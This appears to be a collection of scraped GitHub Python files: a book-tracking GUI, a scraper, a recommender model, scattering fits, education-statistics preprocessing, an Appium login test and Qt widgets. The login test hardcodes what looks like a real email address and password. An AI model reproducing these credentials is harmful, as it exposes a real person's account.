Functionality is reduced.\"\n warn(text, UserWarning)\n\n # Most recent geolocation\n afid = find_main_affiliation(identifier, self._publications, year)\n self._affiliation_id = afid\n try:\n aff = AffiliationRetrieval(afid, refresh=refresh)\n self._affiliation_country = aff.country\n self._affiliation_name = aff.affiliation_name\n self._affiliation_type = aff.org_type\n except (Scopus404Error, ValueError):\n self._affiliation_country = None\n self._affiliation_name = None\n self._affiliation_type = None\n self._language = None\n\n # Author name from profile with most documents\n df = get_authors(self.identifier, self.sql_conn,\n refresh=refresh, verbose=False)\n au = df.sort_values(\"documents\", ascending=False).iloc[0]\n self._subjects = [a.split(\" \")[0] for a in au.areas.split(\"; \")]\n self._surname = au.surname or None\n self._first_name = au.givenname or None\n name = \", \".join([self._surname or \"\", au.givenname or \"\"])\n if name == \", \":\n name = None\n self._name = name\n\n def get_publication_languages(self, refresh=False):\n \"\"\"Parse languages of published documents.\"\"\"\n langs = set()\n for eid in self._eids:\n try:\n ab = AbstractRetrieval(eid, view=\"FULL\", refresh=refresh)\n except Scopus404Error:\n continue\n langs.add(ab.language)\n self._language = \"; \".join(sorted(filter(None, langs)))\n return self\n","repo_name":"sosia-dev/sosia","sub_path":"sosia/classes/scientist.py","file_name":"scientist.py","file_ext":"py","file_size_in_byte":13012,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"70312075369","text":"import customtkinter as ctk\nfrom settings import *\nimport sqlite3\n\n\nclass WindowSlideBooks():\n \n bool_window = False # variável de classe\n \n def __init__(self, parent):\n \n \n\n # layout\n parent.columnconfigure(0, weight=1, uniform='a')\n parent.rowconfigure((0,1,2,3,4,5,6,7,8,9), weight=1, uniform='a')\n \n # fonts\n font = ctk.CTkFont(family=FONT, size=24, weight='bold')\n font_buttons = ctk.CTkFont(family=FONT, size=24, weight='bold')\n \n \n # frames\n main_frame = ctk.CTkFrame(parent, fg_color=DARK_GRAY, )\n main_frame.grid(column=0, row=0, rowspan=10, sticky='nsew', pady=0, padx=0)\n \n main_frame.columnconfigure(0, weight=1, uniform='b')\n main_frame.rowconfigure(0, weight=1, uniform='b')\n main_frame.rowconfigure(1, weight=9, uniform='b')\n main_frame.rowconfigure(2, weight=1, uniform='b')\n \n top_frame = ctk.CTkFrame(main_frame, fg_color=LIGHT_BLUE, corner_radius=20)\n top_frame.grid(column=0, row=0, sticky='nsew', pady=5, padx=5)\n \n middle_frame = ctk.CTkFrame(main_frame, fg_color='transparent', )\n middle_frame.grid(column=0, row=1, sticky='nsew', pady=5, padx=5)\n middle_frame.columnconfigure(0, weight=1, uniform='c')\n middle_frame.rowconfigure(0, weight=1, uniform='c')\n middle_frame.rowconfigure(1, weight=14, uniform='c')\n \n segmented_frame = ctk.CTkFrame(middle_frame, fg_color= 'transparent', corner_radius=20)\n segmented_frame.grid(column=0, row=0, sticky='nsew', pady=0, padx=0)\n \n scroll_frame = ctk.CTkScrollableFrame(middle_frame, fg_color=BLACK, corner_radius=20)\n scroll_frame.grid(column=0, row=1, sticky='nsew', pady=10, padx=10)\n scroll_frame.columnconfigure(0, weight=5, uniform='d')\n scroll_frame.columnconfigure(1, weight=1, uniform='d')\n scroll_frame.columnconfigure(2, weight=2, uniform='d')\n scroll_frame.rowconfigure((0,1,2,3,4), weight=1, uniform='d')\n \n self.scroll_frame = scroll_frame\n \n\n # text top\n text_top = 
ctk.CTkLabel(master=top_frame, text='Meus Livros', text_color=BLACK, font=font,\n fg_color='transparent',\n corner_radius=20)\n # text_top.grid(column=0,row=0, sticky='new', pady=0, padx=0)\n text_top.place(relx=0.5, rely=0.5, anchor='center')\n \n \n # back = ctk.CTkLabel(master=top_frame, text='>>', text_color=BLACK, font=font,\n # fg_color='transparent',\n # corner_radius=20)\n # back.place(relx=0.05, rely=0.5, anchor='center')\n \n \n \n \n \n # segmented button\n font_seg = ctk.CTkFont(family=FONT, size=15, weight='bold')\n segmented_button = ctk.CTkSegmentedButton(master=segmented_frame, corner_radius=20,\n values=['Todos', 'Lidos', 'Não Lidos'],\n border_width=5,\n selected_color=GRAY, text_color=LIGHT_BLUE, font=font_seg,\n unselected_color=BLACK, fg_color=BLACK, text_color_disabled=LIGHT_BLUE,\n selected_hover_color=GRAY, unselected_hover_color=GRAY,\n command=self.segmented_button_callback)\n segmented_button.set('Todos')\n segmented_button.place(relx=0.5, rely=0.5, anchor='center')\n # segmented_button.configure(state='disabled')\n # segmented_button.grid(column=0, row=0, sticky='nsew', pady=0, padx=0)\n \n \n \n \n self.show_books(scroll_frame)\n \n \n \n \n \n # add book button\n from .WindowAddBooks import WindowAddBooks\n add_book = ctk.CTkButton(master=main_frame, text='+', \n command=lambda: WindowAddBooks(scroll_frame),\n fg_color=LIGHT_BLUE,\n text_color=BLACK,\n font=font_buttons,\n width=50, height=50,\n corner_radius=100)\n # add_book.grid(column=0, row=2, columnspan=9, sticky='ns', pady=7)\n add_book.place(relx=0.5, rely=0.9425, anchor='center')\n \n \n \n def segmented_button_callback(self, value):\n if value == 'Todos':\n self.show_books(self.scroll_frame, filtro=None)\n elif value == 'Lidos':\n self.show_books(self.scroll_frame, filtro=1)\n elif value == 'Não Lidos':\n self.show_books(self.scroll_frame, filtro=0)\n \n \n \n def show_books(self, scroll_frame, filtro=None):\n # limpar frame\n for widget in scroll_frame.winfo_children():\n widget.destroy()\n \n \n # mostrar livros cadastrados no banco de dados\n conn = sqlite3.connect('database.db')\n cursor = conn.cursor()\n if filtro == None:\n cursor.execute('SELECT * FROM livros ORDER BY id DESC')\n else:\n cursor.execute(f'SELECT * FROM livros WHERE status = {filtro} ORDER BY id DESC')\n livros = cursor.fetchall()\n conn.close()\n \n font = ctk.CTkFont(family=FONT, size=18)\n \n for i, livro in enumerate(livros):\n if livro[3] == None:\n \n ctk.CTkLabel(scroll_frame, text=f'{livro[1]} - {livro[2]}', font=font, \n height=40,\n text_color=WHITE, fg_color=DARK_GRAY, corner_radius=20).grid(row = i, pady=10, padx=10,\n sticky='nsew')\n else:\n \n ctk.CTkLabel(scroll_frame, text=f'{livro[1]} - {livro[2]}', font=font, \n height=40,\n text_color=LIGHT_BLUE, fg_color=DARK_GRAY, corner_radius=20).grid(column=0, row=i, pady=10, padx=10,\n sticky='nsew')\n ctk.CTkLabel(scroll_frame, text=f'{livro[3]}', font=font, height=40,\n text_color=LIGHT_BLUE, fg_color=DARK_GRAY, corner_radius=20).grid(column=1, row=i, pady=10, padx=0,\n sticky='nsew')\n nota = \" ★ \" * livro[4]\n \n ctk.CTkLabel(scroll_frame, text=f'{nota}', font=font, height=40,\n text_color=LIGHT_BLUE, fg_color=DARK_GRAY, corner_radius=20).grid(column=2, row=i, pady=10, padx=10,\n sticky='nsew')\n \n \n \n \n ","repo_name":"EduardoWS/e-library","sub_path":"widgets/WindowSlideBooks.py","file_name":"WindowSlideBooks.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
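The show_books method above builds its WHERE clause with an f-string; that works here because filtro is always 0 or 1, but sqlite3's "?" placeholders are the idiomatic way to pass values into a query. A minimal, self-contained sketch, where the in-memory database, the titulo column, and the fetch_books helper are illustrative stand-ins rather than part of the repository above:

import sqlite3

# Illustrative stand-in for database.db; only the 'status' column mirrors the code above.
conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE livros (id INTEGER PRIMARY KEY, titulo TEXT, status INTEGER)')
conn.executemany('INSERT INTO livros (titulo, status) VALUES (?, ?)',
                 [('Dom Casmurro', 1), ('O Alienista', 0)])

def fetch_books(conn, filtro=None):
    # '?' lets sqlite3 bind the value instead of splicing it into the SQL text.
    if filtro is None:
        cursor = conn.execute('SELECT * FROM livros ORDER BY id DESC')
    else:
        cursor = conn.execute('SELECT * FROM livros WHERE status = ? ORDER BY id DESC',
                              (filtro,))
    return cursor.fetchall()

print(fetch_books(conn, filtro=1))  # rows for books marked as read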
+{"seq_id":"36259993465","text":"class Solution:\n def addToArrayForm(self, A, K):\n helper = []\n num_a = 0\n carry = 0\n while len(A) > 0:\n num_a = num_a + A.pop() * (10 ** carry)\n carry += 1\n num = num_a + K\n while num > 0:\n addons = num % 10\n num = int(num / 10)\n helper.insert(0, addons)\n return helper\n\n\nslu = Solution()\nprint(slu.addToArrayForm([1, 2, 0, 1], 34))\n","repo_name":"kefirzhang/algorithms","sub_path":"leetcode/python/easy/p989_addToArrayForm.py","file_name":"p989_addToArrayForm.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72390585448","text":"import requests\nfrom bs4 import BeautifulSoup\nimport bs4\n##步骤1:从网页获取大学排名内容\n##步骤2:提取内容到特定的数据结构\n##步骤3:利用数据结构来展示数据\ndef getHTMLText(url):\n\ttry:\n\t\tr=requests.get(url,timeout=30)\n\t\tr.raise_for_status\n\t\tr.encoding=r.apparent_encoding\n\t\treturn r.text\n\texcept :\n\t\treturn \"\"\n\ndef fillUniList(ulist,html):\n\tsoup=BeautifulSoup(html,'html.parser')\n\tfor tr in soup.find('tbody').children:\n\t\tif isinstance(tr,bs4.element.Tag):\n\t\t\ttds=tr('td')\n\t\t\tulist.append([tds[0].string,tds[1].string,tds[4].string])\ndef printUniList(ulist,num):\n\tprint('{0:^10}\\t{1:^10}\\t{2:^10}'.format('排名','学校','评分',chr(12288)))\n\tfor i in range(num):\n\t\tu=ulist[i]\n\t\tprint('{:^10}\\t{:^10}\\t{:^10}'.format(u[0],u[1],u[2],chr(12288)))\n\ndef main():\n\tuinfo=[]\n\turl='http://www.zuihaodaxue.cn/zuihaodaxuepaiming2018.html'\n\thtml=getHTMLText(url)\n\tfillUniList(uinfo,html)\n\tprintUniList(uinfo,10)\nmain()","repo_name":"Flintstone-xu/crawler","sub_path":"UniversityRank.py","file_name":"UniversityRank.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33532301190","text":"import tensorflow as tf\nimport tensorflow.compat.v1 as tfv1\nimport os\nimport numpy as np\nclass base_model(object):\n def __init__(self, conf, reg, learning_rate):\n self.conf = conf\n self.reg = reg\n self.learning_rate = learning_rate\n self.dim = self.conf.dimension\n self.num_users = self.conf.num_users\n self.num_items = self.conf.num_items\n self.num_negatives = self.conf.num_negatives\n self.batch_size = self.conf.training_batch_size\n\n def startConstructGraph(self):\n self.initializeNodes()\n self.constructTrainGraph()\n self.saveVariables()\n self.defineMap()\n\n def initializeNodes(self):\n tfv1.disable_eager_execution()\n self.item_input = tfv1.placeholder(\"int32\", [None])\n self.user_input = tfv1.placeholder(\"int32\", [None])\n self.item_neg_input = tfv1.placeholder(\"int32\", [None, self.num_negatives, 1])\n if self.conf.pretrain_flag:\n pre_emb = np.load(os.path.join(os.getcwd(), 'embedding', self.conf.data_name, self.conf.pre_train), encoding='latin1')\n user_embedding, item_embedding = pre_emb['user_embedding'], pre_emb['item_embedding']\n self.user_embedding = tf.Variable(\n user_embedding/np.linalg.norm(user_embedding, axis=1, keepdims=True), name='user_embedding')\n self.item_embedding = tf.Variable(\n item_embedding/np.linalg.norm(item_embedding, axis=1, keepdims=True), name='item_embedding')\n if 'dis' in self.conf.model_name:\n user_social_embedding, item_social_embedding = pre_emb['user_social_embedding'], pre_emb['item_social_embedding']\n self.user_social_embedding = tf.Variable(\n user_social_embedding/np.linalg.norm(user_social_embedding, axis=1, keepdims=True), name='user_social_embedding')\n 
self.item_social_embedding = tf.Variable(\n item_social_embedding/np.linalg.norm(item_social_embedding, axis=1, keepdims=True), name='item_social_embedding')\n else:\n self.user_embedding = tf.Variable(\n tf.random.normal([self.num_users, self.conf.dimension], stddev=0.01), name='user_embedding')\n self.item_embedding = tf.Variable(\n tf.random.normal([self.num_items, self.conf.dimension], stddev=0.01), name='item_embedding')\n \n def constructTrainGraph(self):\n raise NotImplementedError\n\n def saveVariables(self):\n raise NotImplementedError\n\n def predict(self, emb_u=None, emb_i=None):\n if emb_u is None:\n emb_u = self.user_embedding\n if emb_i is None:\n emb_i = self.item_embedding\n emb_u_gather = tf.gather(emb_u, self.user_input)\n return tf.matmul(emb_u_gather, tf.transpose(emb_i))\n\n def BPRloss(self, emb_u=None, emb_i=None, reg=True):\n if emb_u is None:\n emb_u = self.user_embedding\n if emb_i is None:\n emb_i = self.item_embedding\n emb_u_gather = tf.gather(emb_u, self.user_input)\n emb_i_gather = tf.gather(emb_i, self.item_input)\n emb_j_gather = tf.gather_nd(emb_i, self.item_neg_input)\n pos_score = tf.reduce_sum(emb_u_gather*emb_i_gather, -1, keepdims=True)\n neg_score = tf.reduce_sum(tf.expand_dims(emb_u_gather, 1)*emb_j_gather, -1, keepdims=False)\n loss = tf.reduce_sum(tf.reduce_mean(tf.nn.softplus(neg_score-pos_score), -1))\n if reg:\n loss += self.reg*(self.regloss([emb_u_gather, emb_i_gather])+self.regloss([emb_j_gather])/self.num_negatives)\n return loss\n\n def regloss(self, tensors):\n loss = 0\n for t in tensors:\n loss += tf.nn.l2_loss(t)\n return loss\n\n\n def defineMap(self):\n from copy import copy\n map_dict = {}\n tmp = {\n self.user_input: 'USER_LIST', \n self.item_input: 'ITEM_LIST', \n self.item_neg_input: 'ITEM_NEG_INPUT'\n }\n map_dict['train'] = tmp\n map_dict['val'] = copy(tmp)\n map_dict['test'] = copy(tmp)\n\n map_dict['eva'] = {\n self.user_input: 'EVA_USER_LIST',\n self.item_input: 'EVA_ITEM_LIST'\n }\n map_dict['out'] = {\n 'train': self.loss,\n 'val': self.loss,\n 'test': self.loss,\n 'eva': self.prediction#, self.prediction_link]\n }\n self.map_dict = map_dict\n\n\n","repo_name":"tsinghua-fib-lab/DISGCN","sub_path":"model/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"37953474900","text":"\"\"\"Stand-alone fitting utilities\"\"\"\n\nimport numpy as np\nfrom scipy.special import gamma, psi\n\nfrom ..misc import easylsq\nfrom ..misc.errorvalue import ErrorValue\n\n__all__ = ['fit_shullroess']\n\ndef fit_shullroess(q, Intensity, Error, R0=None, r=None):\n \"\"\"Do a Shull-Roess fitting on the scattering data.\n\n Inputs:\n q: np.ndarray[ndim=1]\n vector of the q values (4*pi*sin(theta)/lambda)\n Intensity: np.ndarray[ndim=1]\n Intensity vector\n Error: np.ndarray[ndim=1]\n Error of the intensity (absolute uncertainty, 1sigma)\n R0: scalar\n first guess for the mean radius (None to autodetermine, default)\n r: np.ndarray[ndim=1]\n vector of the abscissa of the resulting size distribution (None to\n autodetermine, default)\n\n Output:\n A: ErrorValue\n the fitted value of the intensity scaling factor\n r0: the r0 parameter of the maxwellian size distribution\n n: the n parameter of the maxwellian size distribution\n r: the abscissa of the fitted size distribution\n maxw: the size distribution\n stat: the statistics dictionary, returned by nlsq_fit()\n\n Note: This first searches for r0, which best 
linearizes the\n log(Intensity) vs. log(q**2+3/r0**2) relation.\n After this is found, the parameters of the fitted line give the\n parameters of a Maxwellian-like particle size distribution function.\n After it a proper least squares fitting is carried out, using the\n obtained values as initial parameters.\n \"\"\"\n q = np.array(q)\n Intensity = np.array(Intensity)\n Error = np.array(Error)\n if R0 is None:\n r0s = np.linspace(1, 2 * np.pi / q.min(), 1000)\n def naive_fit_chi2(q, Intensity, r0):\n p = np.polyfit(np.log(q ** 2 + 3 / r0 ** 2), np.log(Intensity), 1)\n return ((np.polyval(p, q) - Intensity) ** 2).sum() / (len(q) - 3)\n chi2 = np.array([naive_fit_chi2(q, Intensity, r0) for r0 in r0s.tolist()])\n R0 = r0s[chi2 == chi2.min()][0]\n def naive_fit(q, Intensity, r0):\n p = np.polyfit(np.log(q ** 2 + 3 / r0 ** 2), np.log(Intensity), 1)\n return np.exp(p[1]), -2 * p[0] - 4\n K, n = naive_fit(q, Intensity, R0)\n def SR_function(q, A, r0, n):\n return A * (q ** 2 + 3 / r0 ** 2) ** (-(n + 4.) * 0.5)\n p, dp, statdict = easylsq.nlsq_fit(q, Intensity, Error, SR_function, (K, R0, n))\n n = ErrorValue(p[2], dp[2])\n r0 = ErrorValue(p[1], dp[1])\n A = ErrorValue(p[0], dp[0])\n if r is None:\n r = np.linspace(np.pi / q.max(), np.pi / q.min(), 1000)\n return A, r0, n, r, maxwellian(r, r0, n), statdict\n\ndef maxwellian(r, r0, n):\n \"\"\"Maxwellian-like distribution of spherical particles\n \n Inputs:\n -------\n r: np.ndarray or scalar\n radii\n r0: positive scalar or ErrorValue\n mean radius\n n: positive scalar or ErrorValue\n \"n\" parameter\n \n Output:\n -------\n the distribution function and its uncertainty as an ErrorValue containing arrays.\n The uncertainty of 'r0' and 'n' is taken into account.\n \n Notes:\n ------\n M(r)=2*r^n/r0^(n+1)*exp(-r^2/r0^2) / gamma((n+1)/2)\n \"\"\"\n r0 = ErrorValue(r0)\n n = ErrorValue(n)\n\n expterm = np.exp(-r ** 2 / r0.val ** 2)\n dmaxdr0 = -2 * r ** n.val * r0.val ** (-n.val - 4) * ((n.val + 1) * r0.val ** 2 - 2 * r ** 2) * expterm / gamma((n.val + 1) * 0.5)\n dmaxdn = -r ** n.val * r0.val ** (-n.val - 1) * expterm * (2 * np.log(r0.val) - 2 * np.log(r) + psi((n.val + 1) * 0.5)) / gamma((n.val + 1) * 0.5)\n\n maxwellian = 2 * r ** n.val * r0.val ** (-n.val - 1) * expterm / gamma((n.val + 1) * 0.5)\n dmaxwellian = (dmaxdn ** 2 * n.err ** 2 + dmaxdr0 ** 2 * r0.err ** 2) ** 0.5\n return ErrorValue(maxwellian, dmaxwellian)\n","repo_name":"awacha/sastool","sub_path":"sastool/fitting/standalone.py","file_name":"standalone.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14834057391","text":"import pandas as pd \nimport numpy as np\nimport dash_table\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nimport os\nfrom warnings import filterwarnings\nfilterwarnings('ignore')\n\n\n\n# Download if data is not available\nfrom kaggle.api.kaggle_api_extended import KaggleApi\nif not os.path.exists(\"edstats-csv-zip-32-mb-/EdStatsData.csv\"):\n api = KaggleApi()\n api.authenticate()\n api.dataset_download_files('theworldbank/education-statistics', unzip=True)\n \n \n#read from the downloaded folder:\ndf = pd.read_csv(\"edstats-csv-zip-32-mb-/EdStatsData.csv\")\n\n#select the columns and the data:\n\nmain_cols = ['Country Code', 'Country Name', 'Indicator Code',\n 'Indicator Name'] + [str(i) for i in range(1990, 
2015)]\ndf = df[main_cols]\n\n###############Grouping and ranking the data###########################\n\n# ask if there is a numeric value\nnum_cols = [col for col in df.columns if np.char.isnumeric(col)]\n\nind_count_year = df[num_cols + [\"Indicator Code\", \"Indicator Name\"]].groupby([\"Indicator Code\", \"Indicator Name\"]).count()\n\n###ranking the data###\nsorted_ind = ind_count_year.sum(axis=1).reset_index(\n name=\"count\").sort_values(['count'], ascending=False)\nsorted_ind['rank'] = sorted_ind['count'].rank(ascending=0)\nsorted_ind_top_20 = sorted_ind.head(20)\n\n##pisa indicator filter####\npd.set_option('display.max_colwidth', None)\nsorted_ind_pisa_top_10 = sorted_ind[sorted_ind[\"Indicator Code\"].str.contains(\n 'PISA')].head(10)\n\n# selection the indicators and create the new data frame:\n\n# now let's choose our 16 top indicators\nindicators = [\n # Population, total, male, female\n \"SP.POP.TOTL.MA.IN\", \"SP.POP.TOTL.FE.IN\", \"SP.POP.TOTL\",\n # Population of the official age for primary education total, male, female\n \"SP.PRM.TOTL.FE.IN\", \"SP.PRE.TOTL.MA.IN\", \"SP.PRM.TOTL.IN\",\n # PISA: Mean performance on the mathematics scale. total, male, female\n \"LO.PISA.MAT\", \"LO.PISA.MAT.FE\", \"LO.PISA.MAT.MA\",\n # PISA: Mean performance on the science scale, total, male, female\n \"LO.PISA.SCI\", \"LO.PISA.SCI.FE\", \"LO.PISA.SCI.MA\",\n # PISA: Mean performance on the reading scale, total, male, female\n \"LO.PISA.REA.MA\", \"LO.PISA.REA.FE\", \"LO.PISA.REA\",\n \"NY.GDP.PCAP.PP.KD\" # GDP per capita, PPP\n]\n\n\n# Country filtering\n\ndf_filter_ind = df[df['Indicator Code'].isin(indicators)]\n\n######### Summary table info for indicators #########################\n\n# file info:\nnum_countries_after_filter_ind = len(df_filter_ind['Country Code'].unique())\nnum_indicators_after_filter_ind = len(df_filter_ind['Indicator Code'].unique())\n\n\n##############same format of summary table################################\n# initialize list\nsummary_table_df_filter_ind = [[\"Countries\", num_countries_after_filter_ind], [\n \"Indicators\", num_indicators_after_filter_ind], [\"Years\", \"1990-2014\"]]\n# Create the pandas DataFrame\nsummary_table_df_filter_ind = pd.DataFrame(\n summary_table_df_filter_ind, columns=['Variables', 'Observations'])\n\n############## top and bottom countries filtering############################\n\nnumber_of_countries = 6\nlist_countries = [] # initialize the list of countries\n\n# function for create a list:\n\n\ndef update_list_countries(dataframe):\n for i in range(number_of_countries):\n list_countries.append(dataframe.iloc[i, 0])\n return list_countries\n\n# # top\nsearch_cols = \"LO.PISA.MAT\"\nprojection = [\"Country Name\", \"2012\"]\npisa_mat_total = df[(df[\"Indicator Code\"] == search_cols) & (df[\"2012\"].notna())]\ntop6_highestPISA_2012 = pisa_mat_total.sort_values(\"2012\", ascending=False)[\n projection].head(number_of_countries)\n\n# # update list:\nupdate_list_countries(top6_highestPISA_2012)\n\n# # bottom\nbottom6_lowestPISA_2012 = pisa_mat_total.sort_values(\"2012\")[projection].head(number_of_countries)\n# # update list country:\nupdate_list_countries(bottom6_lowestPISA_2012)\n\n\n######################\n# 1) TOP 20 overall indicators (LISTO)\n# 2) Top 10 pisa indicators (listo)\n# 3) summary table with the variables and observations\n# 3) FOURTH: Top 50 indicators\n# 4) TOP 6, BOTTOM 6,\n# 5) TOP 6 WITH HIGHEST GROWTH RATE, BOTTOM 6 WITH LOWEST GROWTH RATE\n# 6) Summary table with the variables and observations\n# 
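The growth columns below are computed as (v_2012 - v_2000) / v_2012 * 100 and\n# (v_2012 - v_2009) / v_2012 * 100, i.e. growth relative to the later year, not the base year.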
\"\"\"\"\"\"\"\"\n\n\n\n\n############let's create a growth rate and filter the countries###\n\ndf['PISA.MAT_growth'] = df[[\"2012\", \"2000\"]].apply(\n lambda row: (row.iloc[0] - row.iloc[1]) / row.iloc[0] * 100, axis=1)\ndf['PISA.MAT_last_year_growth'] = df[[\"2012\", \"2009\"]].apply(\n lambda row: (row.iloc[0] - row.iloc[1]) / row.iloc[0] * 100, axis=1)\n\n# the projection data frame with variables to include\nprojection = [\"Country Name\", \"2000\", \"2012\", \"PISA.MAT_growth\"]\n\n# creating the new data frame which include the top and bottom 6 with highest and lowest growth between the years span\n\npisa_mat_total = df[(df[\"Indicator Code\"] == search_cols) & (df[\"PISA.MAT_growth\"].notna())]\n# top6:\ntop6_overall = pisa_mat_total.sort_values(\"PISA.MAT_growth\", ascending=False)[\n projection].head(number_of_countries)\nupdate_list_countries(top6_overall) # update list\n\n# bottom 6:\nbottom6_overall = pisa_mat_total.sort_values(\n \"PISA.MAT_growth\")[projection].head(number_of_countries)\n\n\nupdate_list_countries(bottom6_overall)\n\n# final list of countries:\ncountries_to_analyse = []\nfor i in list_countries:\n if i not in countries_to_analyse:\n countries_to_analyse.append(i)\n \n \nfinal_df = df_filter_ind[\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[0]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[1]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[2]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[3]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[4]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[5]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[6]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[7]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[8]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[9]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[10]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[11]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[12]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[13]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[14]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[15]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[16]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[17]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[18]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[19]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[20]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[21]) |\n (df_filter_ind[\"Country Name\"] == countries_to_analyse[22])\n]\n","repo_name":"ajungo2/World-Education","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18485355834","text":"from common.myunit import startEnd\nfrom youstar_page.login_page import LoginPage\nimport unittest\nimport logging\n\n\nclass Test_loign(startEnd):\n \"\"\"youstar登录测试\"\"\"\n\n def test_login_success(self):\n \"\"\"vip登录成功\"\"\"\n logging.info(\"-----test_login_success------\")\n login = LoginPage(self.driver)\n login.vip_loin(\"chuiling950720@gmail.com\", \"9507201995\")\n login.check_process()\n self.assertTrue(login.check_search())\n\n def test_login_fail(self):\n \"\"\"vip登录失败\"\"\"\n 
logging.info(\"-----test_login_fail------\")\n login = LoginPage(self.driver)\n login.vip_loin(\"chuiling950720@gmail.com\", \"9507205\")\n self.assertFalse(login.check_search())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"qangcheng/youstar_appium","sub_path":"test_case/test_youstarlogin.py","file_name":"test_youstarlogin.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21816124654","text":"from typing import List\nfrom pathlib import Path\n\nfrom qtpy.QtCore import Qt, QRegExp, QModelIndex\nfrom qtpy.QtGui import QRegExpValidator\nfrom qtpy.QtWidgets import (\n\n QAbstractItemView,\n QComboBox,\n QSpinBox,\n QSplitter,\n QTextBrowser,\n QTabWidget,\n QTableWidget,\n QListWidget,\n QListWidgetItem,\n QFormLayout,\n QLineEdit,\n QStackedLayout,\n QWidget,\n QFileDialog,\n QMessageBox,\n QTableWidgetItem,\n QHeaderView,\n QInputDialog,\n QStyledItemDelegate,\n QStyle,\n QCheckBox,\n QPushButton,\n QVBoxLayout,\n QHBoxLayout,\n QFrame,\n QLabel\n)\n\nimport vodex as vx\n\n\n# _______________________________________________________________________________\n# Collapsable implementation can be also found\n# https://stackoverflow.com/questions/52615115/how-to-create-collapsible-box-in-pyqt\n\n\ndef horizontal_line():\n line = QFrame()\n # line.setGeometry(QRect(60, 110, 751, 20))\n line.setFrameShape(QFrame.HLine)\n # line.setFrameShadow(QFrame.Sunken)\n return line\n\n\ndef clear_layout(layout, keep=0):\n # from https://stackoverflow.com/questions/4528347/clear-all-widgets-in-a-layout-in-pyqt\n while layout.count() - keep:\n child = layout.takeAt(0)\n if child.widget():\n child.widget().deleteLater()\n\n\nclass InputError(QMessageBox):\n def __init__(self, title=\"Input Error\"):\n super().__init__()\n # tutorial on message boxes: https://www.techwithtim.net/tutorials/pyqt5-tutorial/messageboxes/\n self.setWindowTitle(title)\n # self.setTextFormat(Qt.RichText)\n self.setStandardButtons(QMessageBox.Ok) # | QMessageBox.Cancel) if adding more buttons, separate with \"|\"\n self.setDefaultButton(QMessageBox.Ok) # setting default button to Cancel\n self.buttonClicked.connect(self.popup_clicked)\n\n def popup_clicked(self, i):\n return i.text()\n\n\nclass UserWarning(QMessageBox):\n def __init__(self, detailed_text):\n super().__init__()\n # tutorial on message boxes: https://www.techwithtim.net/tutorials/pyqt5-tutorial/messageboxes/\n self.setWindowTitle(\"Warning!\")\n self.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel) # if adding more buttons, separate with \"|\"\n self.setDefaultButton(QMessageBox.Cancel) # setting default button to Cancel\n self.setText(detailed_text)\n self.buttonClicked.connect(self.popup_clicked)\n\n def popup_clicked(self, i):\n return i.text()\n\n\nclass LabelCheckBox(QCheckBox):\n \"\"\"\n Saves the group information and sets the text to name.\n \"\"\"\n\n def __init__(self, group: str, name: str):\n super().__init__()\n self.label_info = (group, name)\n self.setText(name)\n\n def get_label_info(self):\n return self.label_info\n\n\nclass ReadOnlyDelegate(QStyledItemDelegate):\n \"\"\"\n Overwrites QStyledItemDelegateto turn off editing.\n \"\"\"\n\n def createEditor(self, parent: QWidget, option: 'QStyleOptionViewItem', index: QModelIndex) -> None:\n return None\n\n\nclass FileListDisplay(QWidget):\n \"\"\"\n Shows files in the folder. 
